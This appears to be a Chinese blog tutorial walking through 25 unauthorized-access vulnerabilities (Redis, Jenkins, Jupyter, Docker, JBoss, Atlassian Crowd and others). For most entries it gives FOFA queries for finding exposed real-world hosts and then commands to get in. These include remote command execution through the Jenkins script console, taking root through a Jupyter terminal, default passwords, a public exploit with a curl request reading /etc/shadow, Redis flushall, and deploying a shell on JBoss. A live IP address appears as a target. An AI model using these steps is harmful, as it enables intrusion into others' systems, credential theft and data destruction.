今天我们来开一个新的坑,未授权访问漏洞,以后我会慢慢更新,大家可以持续跟进一下,谢谢大家!
未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。日录遍历目前主要存在未授权访问漏洞的有:NFS 服务,Samba服务,LDAP,Rsync,FTPGitLab,Jenkins,MongoDB, Redis, ZooKeeper, ElasticSearch, Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo 等...
一、Redis未授权访问漏洞
1.在fofa上搜索 port="6379"找到一个具有未授权访问漏洞的网页(6379为默认的redis端口号)
2.在kali里安装redis 命令为:apt install redis
3.安装成功后输入redis-cli -h ip地址 -p 6379,进入后输入info显示成功
#redis常见命令
(1)查看信息:info
(2)删除所有数据库内容:flushall
(3)刷新数据库:flushdb
(4)看所有键:KEYS *,使用selectnum可以查看键值数据
(5)设置变量:set test"whoami"
(6)config set dir dirpath 设置路径等配置
(7)config get dir/dbfilename 获取路径及数据配置信息
(8)save保存
(9)get 变量,查看变量名称
二、MongoDB未授权访问漏洞
1.因为mongoDB的默认端口为27017,我们直接在fofa上搜索 port="27017"(搜索端口号为27017的网站)
2.打开navicat进行连接连接名任意,主机填写找到的网址,点击测试连接,提示连接成功证明存在漏洞
三、Memcached未授权访问漏洞
Windows 下安装 Memcached | 菜鸟教程 下载64位1.4.5版本的
1.解压好在此目录打开命令行
2.在命令行输入memcached.exe -d install、memcached.exe -d start
3.打开kali输入telnet 存在漏洞的ip 11211进行telnet侦测
4.输入stats,查看memcache服务状态
5.使用Nmap程序的脚本进行漏洞扫描,nmap -p 11211 --script memcached-info ip地址
四、Zookeeper未授权访问漏洞
1.使用fofa搜索端口号为2181的网站
2.在kali中输入 echo envinc 114.242.175.75 2181 进行未授权访问漏洞测试
五、Jenkins未授权漏洞
1.在fofa中搜索 port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
2.在打开的页面地址栏后加/manage/script/index.php进入
3.在其中输入println "whoami".execute().text找到他的用户名
六、Jupyter NoteBook未授权访问漏洞
1.在fofa中搜索"Jupyter Notebook" && port="8888" && "terminals"
2.找到一个不需要密码的网站证明存在未授权访问漏洞,并且会直接跳到web管理界面
3.点击new-->termial新建一个终端
4.输入whomi、ls以及sudo su 进入root证明存在漏洞
七、Elasticsearch未授权访问漏洞
1.在fofa中搜索"Elasticsearch" && port="9200"
2.存在未授权漏洞可以直接访问
3.在地址栏后加/_nodes可以查看节点信息
八、Kibana未授权访问漏洞
1.在fofa中搜索"kibana" && port="5601"
2.直接进入说明有未授权访问漏洞
九、Docker Remote APl未授权访问漏洞
1.在fofa中搜索port="2375"
2.可以查看到info信息证明存在漏洞
十、Kubernetes Api Server未授权访问漏洞
1.在fofa中搜索port="8080" && app="Kubernetes"
2.进入可以看到api信息证明存在未授权访问漏洞
十一、Hadoop未授权访问漏洞
1.在fofa中搜索port="8088" && app="Hadoop"
2.开启页面直接访问不经过用户密码验证.
十二、ActiveMQ未授权访问漏洞
1.在fofa中搜索body="ActiveMQ" && port="8161"
2.进入后点击manage....
3.在弹出的登录框中输入弱口令admin/admin即可成功进入
十三、RabbitMQ未授权访问漏洞
1.在fofa中搜索port="15672"
2.在进入的网站弹出的登录框中输入弱口令guest/guest进入即可
十四、Springboot Actuator未授权访问漏洞
1.在fofa中搜索icon_hash="116323821"
2.当进入显示以下界面时证明使用的是springboot框架
3.在地址栏后拼接一下路径查看泄露的数据
十五、FTP未授权访问漏洞(匿名登陆)
1.对目标环境在资源管理器中用以下格式访问,如果该服务器开启了匿名登陆,则可直接进行内容
查看..
十六、JBoss未授权访问漏洞
1.在fofa中搜索title="'Welcome to JBoss"
2.在url后增加/jmx-console/进入控制台页面
3.后续可以利用 jboss.deployment 部署shell
十七、Ldap未授权访问漏洞
1.在fofa中搜索port="389"
2.使用以下Fofa语法搜索使用Idap服务的产品….并通过Ldapadmin可视化工具做连接验证..
LDAP Admin download | SourceForge.net
3.启动工具并测试存在未授权的LDAP服务...成功如下.
点击connect
十八、Rsync未授权访问漏洞
1.在fofa中搜索 (port="873") && (is_honeypot=false && is_fraud=false)
2.在kali中打开终端输入 rsync rsync://ip:端口/
3.查看他的下级目录rsync rsync://ip:端口号/ereedu
十九、VNC未授权访问漏洞
1.使用fofa搜索(port="5900") && (is_honeypot=false && is_fraud=false)
2.vnc链接验证
二十、Dubbo未授权访问漏洞
1.使用fofa搜索 (app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)
2.打开kali 打开终端输入telnet ip port
二十一、NSF共享目录未授权访问
1.在fofa搜索框中搜索 "nfs"
2.在kali中安装nfs客户端
3.使用命令查看找到网站的nfs服务器上的共享目录
二十二、Druid未授权访问漏洞
1.使用fofa搜索 title="Druid Stat Index"
2.在打开的url后添加/druid/index.html,如果可以无需登录,即可登录到Druid监控界面,则说明该网站存在Druid未授权访问漏洞
也可以在后面跟
/system/druid/websession.html
/webpage/system/druid/websession.html
二十三、CouchDB未授权访问
1.使用fofa搜索 (port="5984") && (is_honeypot=false && is_fraud=flase)
2.使用kali执行未授权访问测试命令 curl ip:port
3.输入curl ip:port/_config
二十四、Altassian Crowd未授权访问漏洞
漏洞利用脚本github地址:https://github.com/jas502n/CVE-2019-11580
1.git clone https://github.com/jas502n/CVE-2019-11580
2.cd CVE-2019-11580/
3.python CVE-2019-11580.py http://192.168.18.138:8095 
4.curl http://192.168.18.138:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow 
二十五、RTSP未授权访问漏洞
1.在fofa中搜索 (port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp"
2.下载vlc 点击媒体-->打开网络串流
3.将找到的网址填入后点击播放
4735
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
